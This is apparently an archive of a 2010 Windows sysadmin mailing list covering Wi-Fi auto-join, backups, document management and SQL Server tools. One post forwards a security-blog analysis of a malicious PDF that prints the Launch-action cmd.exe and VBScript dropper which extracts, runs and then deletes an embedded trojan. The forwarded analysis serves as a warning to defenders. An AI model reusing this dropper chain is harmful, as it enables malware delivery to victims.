> I am asking because I honestly don't know.  For me, it's a bigger question
> of being aware of how your device is configured and from where you are
> getting your internet access.
>
>  --
> *From:* David Lum [mailto:david@nwea.org]
> *Sent:* Wednesday, April 28, 2010 3:21 PM
> *To:* NT System Admin Issues
> *Subject:* Anyone see a problem?
>
>"Typically, an iPhone will look for a specific MAC address--the unique
> identifier for the router--to verify that the wireless network is a device a
> user agreed to join previously. However, if the iPhone has previously
> connected to any one of the numerous free AT&T Wi-Fi hot spots (offered at
> virtually every Starbucks in the U.S., for example) the device will ignore
> what the MAC address says and simply connect to the network if it has "AT&T
> Wifi" attached, Kamkar said".
>
>
>
> http://news.cnet.com/8301-27080_3-20003455-245.html?tag=mncol;title
>
> *David Lum** **// *SYSTEMS ENGINEER
> NORTHWEST EVALUATION ASSOCIATION
> (Desk) 971.222.1025 *// *(Cell) 503.267.9764
>
>
>
>
>
>
>
>
>
>
>
>

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: Anyone see a problem?

[Mayo, Bill]

Is this unique?  In other words, if you connect to a wi-fi network named
"linksys" (rare, I know) with pretty much any device and then come
within range of a different network named "linksys" will it
automatically connect?  I am asking because I honestly don't know.  For
me, it's a bigger question of being aware of how your device is
configured and from where you are getting your internet access.



From: David Lum [mailto:david@nwea.org] 
Sent: Wednesday, April 28, 2010 3:21 PM
To: NT System Admin Issues
Subject: Anyone see a problem?



"Typically, an iPhone will look for a specific MAC address--the unique
identifier for the router--to verify that the wireless network is a
device a user agreed to join previously. However, if the iPhone has
previously connected to any one of the numerous free AT&T Wi-Fi hot
spots (offered at virtually every Starbucks in the U.S., for example)
the device will ignore what the MAC address says and simply connect to
the network if it has "AT&T Wifi" attached, Kamkar said".

 

http://news.cnet.com/8301-27080_3-20003455-245.html?tag=mncol;title

David Lum // SYSTEMS ENGINEER 
NORTHWEST EVALUATION ASSOCIATION
(Desk) 971.222.1025 // (Cell) 503.267.9764

 

 

 


~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: Document Management Systems

[Roger Wright]

We'd probably start with a "going forward" methodology, not worrying
about existing files.

More concerned with files that are currently in electronic format
(.xls, .pdf, .jpg, etc.) than in paper format.  Those that are paper
would have to be scanned and indexed along with the related electronic
files.


Die dulci fruere!

Roger Wright
___




On Wed, Apr 28, 2010 at 3:00 PM, Ray  wrote:
> Full text retrieval? What about existing documents, both printed and
> non-printed?
>
> -Original Message-
> From: Raper, Jonathan - Eagle [mailto:jra...@eaglemds.com]
> Sent: Wednesday, April 28, 2010 11:21 AM
> To: NT System Admin Issues
> Subject: RE: Document Management Systems
>
> +1 - I'm looking for this kind of information as well.
>
> We're looking to leverage the fax server built into our Electronic Medical
> Record system to handle administrative/non-clinical information in order to
> minimize the receipt of paper faxing altogether, if possible. This would
> require a third party application to grab the documents from the fax server.
> Taking it a step further, I could see the possible assigning of fax numbers
> to individuals, but we've got to have a workable solution in place first.
> I'm sure whatever we decide on would be able to do much more than that, but
> that would be our entry point.
>
> Jonathan L. Raper, A+, MCSA, MCSE
> Technology Coordinator
> Eagle Physicians & Associates, PA
> jra...@eaglemds.com
> www.eaglemds.com
>
>
> -Original Message-
> From: Roger Wright [mailto:rhw...@gmail.com]
> Sent: Wednesday, April 28, 2010 2:11 PM
> To: NT System Admin Issues
> Subject: Document Management Systems
>
> My company is beginning to look at some type of document management
> system for ease of access, DR, and litigation compliance.  One thing
> we've determined is that we need to decide on a retention policy
> before going much further.  Other than that, we don't know whether an
> in-house or hosted solution would be best, or if it's even a
> cost-effective option to pursue.
>
> Any one care to share how you've made the transition from paper to
> electronic document management?
> Perhaps some lessons learned or "solutions" to avoid?
>
> TIA...
>
>
> Die dulci fruere!
>
> Roger Wright
> ___
>
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~
> ~   ~
>
> Any medical information contained in this electronic message is CONFIDENTIAL
> and privileged. It is unlawful for unauthorized persons to view, copy,
> disclose, or disseminate CONFIDENTIAL information. This electronic message
> may contain information that is confidential and/or legally privileged. It
> is intended only for the use of the individual(s) and/or entity named as
> recipients in the message. If you are not an intended recipient of this
> message, please notify the sender immediately and delete this material from
> your computer. Do not deliver, distribute or copy this message, and do not
> disclose its contents or take any action in reliance on the information that
> it contains.
>
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~
> ~   ~
>
>
>
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~
> ~   ~
>

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: Anyone see a problem?

[Don Guyer]

Yes I do! Who, in their right mind, pays $5 for a cup of coffee?!

 

J

 

Don Guyer

Systems Engineer - Information Services

Prudential, Fox & Roach/Trident Group

431 W. Lancaster Avenue

Devon, PA 19333

Direct: (610) 993-3299

Fax: (610) 650-5306

don.gu...@prufoxroach.com  

 

From: David Lum [mailto:david@nwea.org] 
Sent: Wednesday, April 28, 2010 3:21 PM
To: NT System Admin Issues
Subject: Anyone see a problem?

 

"Typically, an iPhone will look for a specific MAC address--the unique
identifier for the router--to verify that the wireless network is a
device a user agreed to join previously. However, if the iPhone has
previously connected to any one of the numerous free AT&T Wi-Fi hot
spots (offered at virtually every Starbucks in the U.S., for example)
the device will ignore what the MAC address says and simply connect to
the network if it has "AT&T Wifi" attached, Kamkar said".

 

http://news.cnet.com/8301-27080_3-20003455-245.html?tag=mncol;title

David Lum // SYSTEMS ENGINEER 
NORTHWEST EVALUATION ASSOCIATION
(Desk) 971.222.1025 // (Cell) 503.267.9764

 

 

 

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: RE: SQL Server 2005 management suite

[Andrew S. Baker]

Don't install SSMSE *on* the SQL server if you ever intend to install the
full version later.

Manage it remotely instead

-ASB: http://XeeSM.com/AndrewBaker

Sent from my Motorola Droid

On Apr 28, 2010 1:58 PM,  wrote:


Thanks!  I didn't notice that last part..

"SSMSE can also manage instances of the SQL Server Database Engine created
by any edition of SQL Server 2005."
-- 
RMc

Jay Dale  wrote on 04/28/2010 12:31:04 PM:



> Is this what you need?

>
> http://www.microsoft.com/downloads/details.aspx?
> displaylang=en&FamilyID=c243a5ae-4bd1-4e3d...

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Anyone see a problem?

[David Lum]

"Typically, an iPhone will look for a specific MAC address--the unique 
identifier for the router--to verify that the wireless network is a device a 
user agreed to join previously. However, if the iPhone has previously connected 
to any one of the numerous free AT&T Wi-Fi hot spots (offered at virtually 
every Starbucks in the U.S., for example) the device will ignore what the MAC 
address says and simply connect to the network if it has "AT&T Wifi" attached, 
Kamkar said".

http://news.cnet.com/8301-27080_3-20003455-245.html?tag=mncol;title
David Lum // SYSTEMS ENGINEER
NORTHWEST EVALUATION ASSOCIATION
(Desk) 971.222.1025 // (Cell) 503.267.9764


~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: backup software solution for offsite

[justino garcia]

Right it access VIA ipsec to the NAS.
using BSD firewalls on both ends.
Pfsense IPSEC.

VPN/IPSEC both ends

The current backup software / application is acronis( not doing a great job,
offsite).


On Wed, Apr 28, 2010 at 2:19 PM, Charlie Kaiser
wrote:

> OK. So how do you access it now? VPN? Direct RDP? Local only? Sounds like
> you need two separate configs; one is the VPN/IPSEC connectivity, and the
> other is the backup application.
>
> Create the tunnel to the NAS device using your connectivity method of
> choice.
>
> Then run the backup locally and do either a copy job (like backup exec
> provides) or manually script a copy up to the NAS. The big hurdle you're
> going to run into is trying to copy large files across that link quickly
> and
> reliably.
>
> Image files present a big challenge since even small changes result in new
> image files that must be uploaded separately.
>
> There are 3rd party tools that can accommodate this, but I don't have a
> specific recommendation. I haven't found one that I like.
>
> Another thing to watch for will be data transfer windows. Depending on the
> size of the upload and the link speed, you could easily run into an
> overlap...
>
> I've had clients want something like this and we have always either moved
> media physically using a manual offsite service like Iron Mountain or
> Datasafe or used Amazon or Mozy. We ran into too many hurdles with
> bandwidth
> utilization and time windows.
>
> Perhaps someone else has a better solution based on their experience...
>
> ***
> Charlie Kaiser
> charl...@golden-eagle.org
> Kingman, AZ
> ***
>
> > -Original Message-
> > From: justino garcia [mailto:jgarciaitl...@gmail.com]
> > Sent: Wednesday, April 28, 2010 10:34 AM
> > To: NT System Admin Issues
> > Subject: Re: backup software solution for offsite
> >
> > I host a server, in a rack, at some one else data-center ( I
> > rent a rack).
> >
> > In the rack,i have a Network Attached storage devices, and
> > some other servers. Clients would like for it to go their,
> > and so would I.
> >
> >
> > On Wed, Apr 28, 2010 at 1:30 PM, Charlie Kaiser
> >  wrote:
> >
> >
> >   Are you saying your OWN datacenter? Or a hosted server
> > in someone else's
> >   datacenter?
> >
> >
> >   ***
> >   Charlie Kaiser
> >   charl...@golden-eagle.org
> >   Kingman, AZ
> >   ***
> >
> >   > -Original Message-
> >   > From: justino garcia [mailto:jgarciaitl...@gmail.com]
> >
> >   > Sent: Wednesday, April 28, 2010 10:19 AM
> >   > To: NT System Admin Issues
> >
> >   > Subject: Re: backup software solution for offsite
> >   >
> >   > I wish to not hosted on a third party cloud, rather just host
> >   > on our own server at the data center.
> >   > and Mozy good, but we want a image snapshot.
> >   >
> >   > Thanks
> >   >
> >   >
> >   > On Wed, Apr 28, 2010 at 1:15 PM, Charlie Kaiser
> >   >  wrote:
> >   >
> >   >
> >   >   Check out Mozy Pro (Mozy.com) or Amazon Web Services.
> >   >
> >   >   ***
> >   >   Charlie Kaiser
> >   >   charl...@golden-eagle.org
> >   >   Kingman, AZ
> >   >   ***
> >   >
> >   >
> >   >   > -Original Message-
> >   >   > From: justino garcia [mailto:jgarciaitl...@gmail.com]
> >   >   > Sent: Wednesday, April 28, 2010 10:08 AM
> >   >   > To: NT System Admin Issues
> >   >   > Subject: backup software solution for offsite
> >   >   >
> >   >   > I have a need to setup offsite backsup via a
> > ipsec tunnel,
> >   >   > thru sftp ftp or smb .
> >   >   > Something we can take daily inc snapshots and
> > send over the
> >   >   > internet using vpn, that has retation rules
> > and alerts to
> >   >   > admin (me) if a backup fails.
> >   >   > Any comercial prosuct any ideas?
> >   >   >
> >   >   > Thanks
> >   >   >
> >   >   >
> >   >   > --
> >   >   > Justin
> >   >   > IT-TECH
> >   >   >
> >   >   > ~ Finally, powerful endpoint security that
> > ISN'T a resource
> >   >   > hog! ~ ~
> >   >   >
> >   ~
> >   >
> >   >
> >   >   ~ Finally, powerful endpoint security that ISN'T a
> >   > resource hog! ~
> >   >   ~
> >   ~
> >   >
> >   >
> >   >
> >   >
> >   >
> >   > --
> >   > Justin
> >   > IT-TECH
> >   >
> >   >
> >   >
> >   >
> >   >
> >   >
> >   >
> >
> >
> >   ~ Finally, powerful endpoint security that ISN'T a
> > resource hog! ~
> >   ~ 

Re: sig pad for Word

[Kevin Lundy]

What, you don't want to spend $50 for every client to get a digital ID?


On Wed, Apr 28, 2010 at 3:07 PM, James Kerr  wrote:

>  Well its for our clients to sign off on medical consent forms.
>
> - Original Message -
> *From:* Kevin Lundy 
> *To:* NT System Admin Issues 
> *Sent:* Wednesday, April 28, 2010 3:05 PM
> *Subject:* Re: sig pad for Word
>
> Have you considered digital signatures?
>
> On Wed, Apr 28, 2010 at 2:46 PM, James Kerr  wrote:
>
>>  Can anyone recommened a inexpensive USB signature pad for signing word
>> documents?
>>
>> James
>>
>>
>>
>>
>>
>>
>>
>>
>
>
>
>
>
>
>
>
>

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: Document Management Systems

[Philip Brothwell]

Take a look at DocuShare.  http://docushare.xerox.com/

I've used it at a couple of companies and it work well for us.




On Wed, Apr 28, 2010 at 2:10 PM, Roger Wright  wrote:

> My company is beginning to look at some type of document management
> system for ease of access, DR, and litigation compliance.  One thing
> we've determined is that we need to decide on a retention policy
> before going much further.  Other than that, we don't know whether an
> in-house or hosted solution would be best, or if it's even a
> cost-effective option to pursue.
>
> Any one care to share how you've made the transition from paper to
> electronic document management?
> Perhaps some lessons learned or "solutions" to avoid?
>
> TIA...
>
>
> Die dulci fruere!
>
> Roger Wright
> ___
>
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~
> ~   ~
>

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: The finer points of NTFS ACLs (was: Software installs on new PCs)

[Andrew S. Baker]

Copy the files to the new location. Or, reapply the perms by script

-ASB: http://XeeSM.com/AndrewBaker

Sent from my Motorola Droid

On Apr 28, 2010 12:45 PM, "Ben Scott"  wrote:

On Wed, Apr 28, 2010 at 11:54 AM, James Rankin 
wrote:
> We see this problem where people create folders under shared drives, that
> each new folder is owned by the creating user who then has the added
rights.
> The solution is some weekly subinacl tasks that re-take ownership of the
> whole fileserver structure back to BUILTIN\Administrators

 Wouldn't it be better to just remove "CREATOR OWNER" from the ACL on
the folder?

 All our shared folders are set so only the group(s) which should
have permission are present.

 The only good use for "CREATOR OWNER" I've found is kludging around
apps that insist on writing to their own program directory.  So grant
users "Create File" on "This folder only", and separately grant
"CREATOR OWNER" "Modify" on "Files only".  Now users can create the
file, but can't touch anything else.

 My biggest beef is that if you move an object within a "drive" on
Windows, Windows does not update the ACL on the object to reflect
different permissions in its new location.  So, for example, when a
file is moved from the QA-only pre-release folder to the whole-company
general-release folder, the file still has permissions for pre-release
and nobody else can read it.  Anyone got a fix for *that*?

-- Ben

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: sig pad for Word

[James Kerr]

Well its for our clients to sign off on medical consent forms.
  - Original Message - 
  From: Kevin Lundy 
  To: NT System Admin Issues 
  Sent: Wednesday, April 28, 2010 3:05 PM
  Subject: Re: sig pad for Word


  Have you considered digital signatures?


  On Wed, Apr 28, 2010 at 2:46 PM, James Kerr  wrote:

Can anyone recommened a inexpensive USB signature pad for signing word 
documents?

James





 






 

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: sig pad for Word

[Kevin Lundy]

Have you considered digital signatures?

On Wed, Apr 28, 2010 at 2:46 PM, James Kerr  wrote:

>  Can anyone recommened a inexpensive USB signature pad for signing word
> documents?
>
> James
>
>
>
>
>
>
>
>

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: Document Management Systems

[Ray]

Full text retrieval? What about existing documents, both printed and
non-printed?   

-Original Message-
From: Raper, Jonathan - Eagle [mailto:jra...@eaglemds.com] 
Sent: Wednesday, April 28, 2010 11:21 AM
To: NT System Admin Issues
Subject: RE: Document Management Systems

+1 - I'm looking for this kind of information as well.

We're looking to leverage the fax server built into our Electronic Medical
Record system to handle administrative/non-clinical information in order to
minimize the receipt of paper faxing altogether, if possible. This would
require a third party application to grab the documents from the fax server.
Taking it a step further, I could see the possible assigning of fax numbers
to individuals, but we've got to have a workable solution in place first.
I'm sure whatever we decide on would be able to do much more than that, but
that would be our entry point.

Jonathan L. Raper, A+, MCSA, MCSE
Technology Coordinator
Eagle Physicians & Associates, PA
jra...@eaglemds.com
www.eaglemds.com


-Original Message-
From: Roger Wright [mailto:rhw...@gmail.com]
Sent: Wednesday, April 28, 2010 2:11 PM
To: NT System Admin Issues
Subject: Document Management Systems

My company is beginning to look at some type of document management
system for ease of access, DR, and litigation compliance.  One thing
we've determined is that we need to decide on a retention policy
before going much further.  Other than that, we don't know whether an
in-house or hosted solution would be best, or if it's even a
cost-effective option to pursue.

Any one care to share how you've made the transition from paper to
electronic document management?
Perhaps some lessons learned or "solutions" to avoid?

TIA...


Die dulci fruere!

Roger Wright
___

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Any medical information contained in this electronic message is CONFIDENTIAL
and privileged. It is unlawful for unauthorized persons to view, copy,
disclose, or disseminate CONFIDENTIAL information. This electronic message
may contain information that is confidential and/or legally privileged. It
is intended only for the use of the individual(s) and/or entity named as
recipients in the message. If you are not an intended recipient of this
message, please notify the sender immediately and delete this material from
your computer. Do not deliver, distribute or copy this message, and do not
disclose its contents or take any action in reliance on the information that
it contains.

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~



~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: SQL Server 2005 management suite

[paul d]

Express Studio doesn't automate backups though.  You can back up but you can't 
schedule it like with the 'full' studio.
You can install from the SQL Server disks.  That's what I did when I had to set 
up the studio on a couple of pc's.
To: ntsysadmin@lyris.sunbelt-software.com
Subject: RE: SQL Server 2005 management suite
From: richardmccl...@aspca.org
Date: Wed, 28 Apr 2010 12:58:04 -0500



Thanks!  I didn't notice that last
part..



"SSMSE can also manage instances of the SQL Server
Database Engine created by any edition of SQL Server 2005."

--

RMc



Jay Dale  wrote on 04/28/2010
12:31:04 PM:



> Is this what you need?

>  

> http://www.microsoft.com/downloads/details.aspx?

> displaylang=en&FamilyID=c243a5ae-4bd1-4e3d-94b8-5a0f62bf7796

>  

>  

> Jay Dale

> I.T. Manager, 3GiG

> Mobile: 713.299.2541

> Email: jay.d...@3-gig.com 

>  

> Confidentiality Notice: This e-mail, including
any attached files, 

> may contain confidential and/or privileged information for the sole


> use of the intended recipient. If you are not the intended 

> recipient, you are hereby notified that any review, dissemination
or

> copying of this e-mail and attachments, if any, or the information


> contained herein, is strictly prohibited. If you are not the 

> intended recipient (or authorized to receive information for the 

> intended recipient), please contact the sender by reply e-mail and


> delete all copies of this message.

>  

>  

> From: richardmccl...@aspca.org [mailto:richardmccl...@aspca.org]


> Sent: Wednesday, April 28, 2010 11:40 AM

> To: NT System Admin Issues

> Subject: SQL Server 2005 management suite

>  

> 

> Greetings! 

> 

> I have a server (Win 2003) with MS SQL Server 2005 (not "Express")


> on it as a part of my VMWare management system.  I need to back
up 

> this database.  It does _not_ have the "Management Suite"
installed.

> I do not believe I have the license key for that installation, either.


> 

> I happen to have a set of SQL Server disks (2 CD, 1 DVD, one "MS


> Library" CD).  I also have the download for SQL Server 2005
Express 

> Management Suite. 

> 

> What is the least bad way to get MS management (again, just for DB


> backup) onto this machine? 

> 

> I figure the "Express" version will not work with "Full"
SQL Server, right? 

> 

> If I were to use one of the "Full" setup disks and run "Setup",


> would I have the option of modifying (ie, adding Mangement Suite)
to

> the current install and existing database?  Is this reasonably
safe to do? 

> 

> I've obviously never before run SQL Server setup before - thanks!

> -- 

> Richard D. McClary 

> Systems Administrator, Information Technology Group 

> ASPCA® 

> 1717 S. Philo Rd, Ste 36 

> Urbana, IL  61802 

>   

> richardmccl...@aspca.org 

>   

> P: 217-337-9761 

> C: 217-417-1182 

> F: 217-337-9761 

> www.aspca.org 

>   

> The information contained in this e-mail, and
any attachments 

> hereto, is from The American Society for the Prevention of Cruelty
to Animals®

> (ASPCA®) and is intended only for use by the addressee(s) named 

> herein and may contain legally privileged and/or confidential 

> information. If you are not the intended recipient of this e-mail,


> you are hereby notified that any dissemination, distribution, 

> copying or use of the contents of this e-mail, and any attachments


> hereto, is strictly prohibited. If you have received this e-mail in


> error, please immediately notify me by reply email and permanently


> delete the original and any copy of this e-mail and any printout thereof.


>   

>  

>  

>  

>  
 



 

  
_
Hotmail has tools for the New Busy. Search, chat and e-mail from your inbox.
http://www.windowslive.com/campaign/thenewbusy?ocid=PID28326::T:WLMTAGL:ON:WL:en-US:WM_HMP:042010_1
~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: sig pad for Word

[Steve Ens]

I have an old Wacom that works great for it...probably find used ones on
Ebay for cheap.

On Wed, Apr 28, 2010 at 1:46 PM, James Kerr  wrote:

>  Can anyone recommened a inexpensive USB signature pad for signing word
> documents?
>
> James
>
>
>
>
>
>
>
>

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: backup software solution for offsite

[Sam Cayze]

+1.

I use standard products for backups, and then a mix of scripts and
3-party products to transfer those backups over the wire.
Rsync, SyncBack, DeltaCopy are a few names...

-Original Message-
From: Charlie Kaiser [mailto:charl...@golden-eagle.org] 
Sent: Wednesday, April 28, 2010 1:19 PM
To: NT System Admin Issues
Subject: RE: backup software solution for offsite

OK. So how do you access it now? VPN? Direct RDP? Local only? Sounds
like you need two separate configs; one is the VPN/IPSEC connectivity,
and the other is the backup application.

Create the tunnel to the NAS device using your connectivity method of
choice.

Then run the backup locally and do either a copy job (like backup exec
provides) or manually script a copy up to the NAS. The big hurdle you're
going to run into is trying to copy large files across that link quickly
and reliably. 

Image files present a big challenge since even small changes result in
new image files that must be uploaded separately.

There are 3rd party tools that can accommodate this, but I don't have a
specific recommendation. I haven't found one that I like.

Another thing to watch for will be data transfer windows. Depending on
the size of the upload and the link speed, you could easily run into an
overlap...

I've had clients want something like this and we have always either
moved media physically using a manual offsite service like Iron Mountain
or Datasafe or used Amazon or Mozy. We ran into too many hurdles with
bandwidth utilization and time windows.

Perhaps someone else has a better solution based on their experience...

***
Charlie Kaiser
charl...@golden-eagle.org
Kingman, AZ
***  

> -Original Message-
> From: justino garcia [mailto:jgarciaitl...@gmail.com]
> Sent: Wednesday, April 28, 2010 10:34 AM
> To: NT System Admin Issues
> Subject: Re: backup software solution for offsite
> 
> I host a server, in a rack, at some one else data-center ( I rent a 
> rack).
> 
> In the rack,i have a Network Attached storage devices, and some other 
> servers. Clients would like for it to go their, and so would I.
> 
> 
> On Wed, Apr 28, 2010 at 1:30 PM, Charlie Kaiser 
>  wrote:
> 
> 
>   Are you saying your OWN datacenter? Or a hosted server 
> in someone else's
>   datacenter?
>   
> 
>   ***
>   Charlie Kaiser
>   charl...@golden-eagle.org
>   Kingman, AZ
>   ***
>   
>   > -Original Message-
>   > From: justino garcia [mailto:jgarciaitl...@gmail.com]
>   
>   > Sent: Wednesday, April 28, 2010 10:19 AM
>   > To: NT System Admin Issues
>   
>   > Subject: Re: backup software solution for offsite
>   >
>   > I wish to not hosted on a third party cloud, rather just host
>   > on our own server at the data center.
>   > and Mozy good, but we want a image snapshot.
>   >
>   > Thanks
>   >
>   >
>   > On Wed, Apr 28, 2010 at 1:15 PM, Charlie Kaiser
>   >  wrote:
>   >
>   >
>   >   Check out Mozy Pro (Mozy.com) or Amazon Web Services.
>   >
>   >   ***
>   >   Charlie Kaiser
>   >   charl...@golden-eagle.org
>   >   Kingman, AZ
>   >   ***
>   >
>   >
>   >   > -Original Message-
>   >   > From: justino garcia [mailto:jgarciaitl...@gmail.com]
>   >   > Sent: Wednesday, April 28, 2010 10:08 AM
>   >   > To: NT System Admin Issues
>   >   > Subject: backup software solution for offsite
>   >   >
>   >   > I have a need to setup offsite backsup via a 
> ipsec tunnel,
>   >   > thru sftp ftp or smb .
>   >   > Something we can take daily inc snapshots and 
> send over the
>   >   > internet using vpn, that has retation rules 
> and alerts to
>   >   > admin (me) if a backup fails.
>   >   > Any comercial prosuct any ideas?
>   >   >
>   >   > Thanks
>   >   >
>   >   >
>   >   > --
>   >   > Justin
>   >   > IT-TECH
>   >   >
>   >   > ~ Finally, powerful endpoint security that 
> ISN'T a resource
>   >   > hog! ~ ~
>   >   > 
>   ~
>   >
>   >
>   >   ~ Finally, powerful endpoint security that ISN'T a
>   > resource hog! ~
>   >   ~ 
>   ~
>   >
>   >
>   >
>   >
>   >
>   > --
>   > Justin
>   > IT-TECH
>   >
>   >
>   >
>   >
>   >
>   >
>   >
>   
>   
>   ~ Finally, powerful endpoint security that ISN'T a 
> resource hog! ~
>   ~   ~
>   
> 
> 
> 
> 
> --
> Justin
> IT-TECH
> 
> 
>  
> 
>  

Just a heads up if you havent seen this PDF attack in your workplaces

[Ziots, Edward]

http://www.secureworks.com/research/blog/index.php/2010/04/27/your-malware-setting-may-have-changed/

Last night and this morning a number of people received an email that looked 
liked this: 

From: notificati...@yyybank.com
[mailto:notificati...@yyybank.com]
Sent: Tuesday, April 27, 2010 7:47 AM
To: x...@bank.com
Subject: setting for your mailbox are changed

SMTP and POP3 servers for x...@yyybank.com mailbox are changed.
Please carefully read the attached instructions before updating settings.
It contained a file called "doc.pdf". That file was, of course, malicious in 
nature. It used the PDF Launch vulnerability to run echo some commands into a 
bat file and then bootstrap itself to running the Emold downloader trojan. 
Let's take a look. 


8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (cmd.exe)
  /P (/c echo Set fso=CreateObject("Scripting.FileSystemObject")
  > script.vbs && echo Set f=fso.OpenTextFile("doc.pdf", 1, True)
  >> script.vbs && echo pf=f.ReadAll
  >> script.vbs && echo s=InStr(pf,"'SS")
  >> script.vbs && echo e=InStr(pf,"'EE")
  >> script.vbs && echo s=Mid(pf,s,e-s)
  >> script.vbs && echo Set z=fso.OpenTextFile("batscript.vbs", 2, True)
  >> script.vbs && echo s = Replace(s,"%","")
  >> script.vbs && echo z.Write(s)
  >> script.vbs && script.vbs && batscript.vbs
This uses cmd.exe to write some lines of text to a file called script.vbs and 
then executes script.vbs and batscript.vbs. 

Let's look at how script.vbs ends up: 


Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.OpenTextFile("doc.pdf", 1, True)
echo pf=f.ReadAll
echo s=InStr(pf,"'SS")
echo e=InStr(pf,"'EE")
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile("batscript.vbs", 2, True)
s = Replace(s,"%","")
z.Write(s)
When Script.vbs runs, it opens doc.pdf and looks for the tags "SS" and "EE" to 
mark the beginning and end of a section of the pdf. It grabs that section, does 
a little bit of text manipulation and then writes the result to batscript.vbs. 

Next let's look what's in that tagged section of doc.pdf (that ends up 
batscript.vbs): 


5 0 obj
<< /Length 46 >>
stream
BT
/F1 34 Tf
50 500 Td
(Important Information
doc.pdf)Tj

%'SS
%Dim b
%Function c(d)
%c=chr(d)
%End Function
%b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),
c(004),c(000),c(000)...
...this line is 248413 characters long...
...c(000),c(000),c(000),c(000 ),"")
%Set fso = CreateObject("Scripting.FileSystemObject")
%Set f = fso.OpenTextFile("game.exe", 2, True)
%For i = 0 To 35328
%f.write(b(i))
%Next
%f.close()
%Set WshShell = WScript.CreateObject("WScript.Shell")
%WshShell.Run "cmd.exe /c game.exe"
%WScript.Sleep 3000
%Set f  = FSO.GetFile("game.exe")
%f.Delete
%Set f  = FSO.GetFile("batscript.vbs")
%f.Delete
%Set f  = FSO.GetFile("script.vbs")
%f.Delete
%'EE
endstream
We can now see that the array stored in b is actually an obfuscated executable 
file that is stored in game.exe. After running game.exe this script (executed 
in batscript.vbs) cleans up after itself by removing game.exe, batscript.vbs, 
and script.vbs. 

Game.exe is the Elmod trojan. This is a generic downloader which can be used to 
install any number of second stage trojans. It can be identified by the 
presence of the file C:/Program Files/Microsoft Common/svchost.exe, the 
registry key "software\Microsoft\Windows NT\CurrentVersion\Image File Execution 
Options\explorer.exe", and because it phones home to (currently) jademason.com.

Adobe has said that the Launch functionality is a feature, not a bug. Adobe is 
looking into the issue, but has not said what action, if any, they intended to 
take to mitigate the danger. Their post on the matter does include directions 
for turning off this functionality. 

This entry was posted on Tuesday, April 27th, 2010 at 6:24 pm.

Edward Ziots
CISSP,MCSA,MCP+I,Security +,Network +,CCA
Network Engineer
Lifespan Organization
401-639-3505
ezi...@lifespan.org

From: Ralph Smith [mailto:m...@gatewayindustries.org] 
Sent: Wednesday, April 28, 2010 2:38 PM
To: NT System Admin Issues
Subject: RE: Low-profile desktop Ethernet adapters

We have about 35 GX520 Small Form Factor computers here.  Out of those we have 
had 2 motherboards replaced, but the biggest problem has been the fan in the 
power supply - I think we are up to about a dozen of them gone bad so far.  
Since they are all out of warranty now, we're just replacing the fans as they 
go bad.


~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

sig pad for Word

[James Kerr]

Can anyone recommened a inexpensive USB signature pad for signing word 
documents?

James


~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: Low-profile desktop Ethernet adapters

[Ralph Smith]

We have about 35 GX520 Small Form Factor computers here.  Out of those
we have had 2 motherboards replaced, but the biggest problem has been
the fan in the power supply - I think we are up to about a dozen of them
gone bad so far.  Since they are all out of warranty now, we're just
replacing the fans as they go bad.

 



From: Carol Fee [mailto:c...@massbar.org] 
Sent: Wednesday, April 28, 2010 1:06 PM
To: NT System Admin Issues
Subject: RE: Low-profile desktop Ethernet adapters

 

How has your experience been with the Optiplex GX520's.  We have had
roughly 30% motherboard failure rate.

 

CFee

From: John Aldrich [mailto:jaldr...@blueridgecarpet.com] 
Sent: Wednesday, April 28, 2010 9:42 AM
To: NT System Admin Issues
Subject: Low-profile desktop Ethernet adapters

 

I need to put a low-profile NIC to replace the on-board NIC that has
gone out on one of our Dell Optiplex GX520 machines.  Wondering what you
guys recommend? I tried to just put an extra  NIC that we have lying
around in the system, but discovered that it's too tall. :-(  Any
favorite brand? Unfortunately, may favorite place (NewEgg) only carries
a handful of low-profile NICs and none of them are "name brand." :-(

 

  

 

 

 

 

 

Confidentiality Notice: 

--



This communication, including any attachments, may contain confidential 
information and is intended only for the individual or entity to whom it is 
addressed. Any review, dissemination, or copying of this communication by 
anyone other than the intended recipient is strictly prohibited. If you are not 
the intended recipient, please contact the sender by reply email, delete and 
destroy all copies of the original message.

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~<><>

RE: Anyone Used Zmanda backup?

[Joseph L. Casale]

I used to use the Enterprise version, it lacked some trivial features like an 
automated verify and the html based console was not all that friendly.
I use Bacula in a mixed environment now...
I like it much better.

From: justino garcia [mailto:jgarciaitl...@gmail.com]
Sent: Wednesday, April 28, 2010 11:59 AM
To: NT System Admin Issues
Subject: Anyone Used Zmanda backup?

Anyone using Zmanda in production, how good is it?

Have you tested a recovery, how does it handle retention policies? And would 
you recommended for off-site backups:?

thanks

--
Justin
IT-TECH





~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: Document Management Systems

[Raper, Jonathan - Eagle]

